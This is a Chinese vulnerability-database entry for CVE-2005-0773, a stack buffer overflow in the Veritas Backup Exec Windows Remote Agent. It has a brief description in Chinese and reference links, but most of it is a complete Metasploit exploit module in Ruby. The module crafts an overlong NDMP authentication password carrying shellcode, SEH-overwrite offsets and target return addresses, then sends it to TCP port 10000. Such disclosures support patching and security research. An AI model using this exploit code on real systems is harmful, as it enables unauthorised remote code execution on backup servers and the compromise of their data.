Veritas Backup Exec Remote Agent for Windows CONNECT_CLIENT_AUTH远程缓冲区溢出漏

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119597 漏洞类型 缓冲区溢出
发布时间 2010-07-03 更新时间 2010-07-03
CVE编号 CVE-2005-0773 CNNVD-ID CNNVD-200506-181
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/16332
https://www.securityfocus.com/bid/14022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-181
|漏洞详情
VeritasBackupExecRemoteAgent是一款支持网络数据管理协议(NDMP)的数据备份和恢复解决方案。VeritasBackupExecRemoteAgent在处理用户认证请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。当客户端发送一个类型3的认证请求,而且带有一个超长的Password字段时会触发缓冲区溢出漏洞,导致执行任意指令。
|漏洞EXP
##
# $Id: remote_agent.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::NDMP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Veritas Backup Exec Windows Remote Agent Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Veritas
				BackupExec Windows Agent software. This vulnerability occurs
				when a client authentication request is received with type
				'3' and a long password argument. Reliable execution is
				obtained by abusing the stack buffer overflow to smash a SEH
				pointer.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2005-0773'],
					[ 'OSVDB', '17624'],
					[ 'BID', '14022'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
					[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Veritas BE 9.0/9.1/10.0 (All Windows)',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x0140f8d5, 0x014261b0 ],
						},
					],
					[
						'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x75022ac4, 0x75022ac4 ],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 22 2005'))

		register_options(
			[
				Opt::RPORT(10000)
			], self.class)
	end

	def check
		info = ndmp_info()
		if (info and info['Version'])
			print_status(" Vendor: #{info['Vendor']}")
			print_status("Product: #{info['Product']}")
			print_status("Version: #{info['Version']}")

			if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
				return Exploit::CheckCode::Detected
			end
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		resp = ndmp_recv()

		username = 'X' * 512
		password = rand_text_alphanumeric(8192)

		# Place our payload early in the request and jump backwards into it
		password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

		# This offset is required for version 10.0
		password[3536, 2] = "\xeb\x06"
		password[3540, 4] = [ target['Rets'][1] ].pack('V')
		password[3544, 5] = "\xe9" + [-1037].pack('V')

		# This offset is required for version 9.0/9.1
		password[4524, 2] = "\xeb\x06"
		password[4528, 4] = [ target['Rets'][0] ].pack('V')
		password[4532, 5] = "\xe9" + [-2025].pack('V')

		# Create the authentication request
		auth = [
				1,               # Sequence number
				Time.now.to_i,   # Current time
				0,               # Message type (request)
				0x901,           # Message name (connect_client_auth)
				0,               # Reply sequence number
				0,               # Error status
				3                # Authentication type
			].pack('NNNNNNN') +
			[ username.length ].pack('N') + username +
			[ password.length ].pack('N') + password +
			[ 4 ].pack('N')

		print_status("Sending authentication request...")
		ndmp_send(auth)

		handler
		disconnect
	end

end
|受影响的产品
Veritas Software Backup Exec for Windows Servers 10.0 rev. 5484 SP1 Veritas Software Backup Exec for Windows Servers 10.0 rev. 5484 Veritas Software Backup Exec for Windows Servers 9.1 rev. 4691 SP2 Verit
|参考资料

来源:US-CERT
名称:TA05-180A
链接:http://www.us-cert.gov/cas/techalerts/TA05-180A.html
来源:US-CERT
名称:VU#492105
链接:http://www.kb.cert.org/vuls/id/492105
来源:BID
名称:14022
链接:http://www.securityfocus.com/bid/14022
来源:seer.support.veritas.com
链接:http://seer.support.veritas.com/docs/277429.htm
来源:seer.support.veritas.com
链接:http://seer.support.veritas.com/docs/276604.htm
来源:SECTRACK
名称:1014273
链接:http://securitytracker.com/id?1014273
来源:SECUNIA
名称:15789
链接:http://secunia.com/advisories/15789
来源:OSVDB
名称:17624
链接:http://www.osvdb.org/17624
来源:IDEFENSE
名称:20050623VeritasBackupExecAgentCONNECT_CLIENT_AUTHBufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities&flashstatus=true
来源:IDEFENSE
名称:20050623VeritasBackupExecAgentCONNECT_CLIENT_AUTHBufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities&flashstatus=true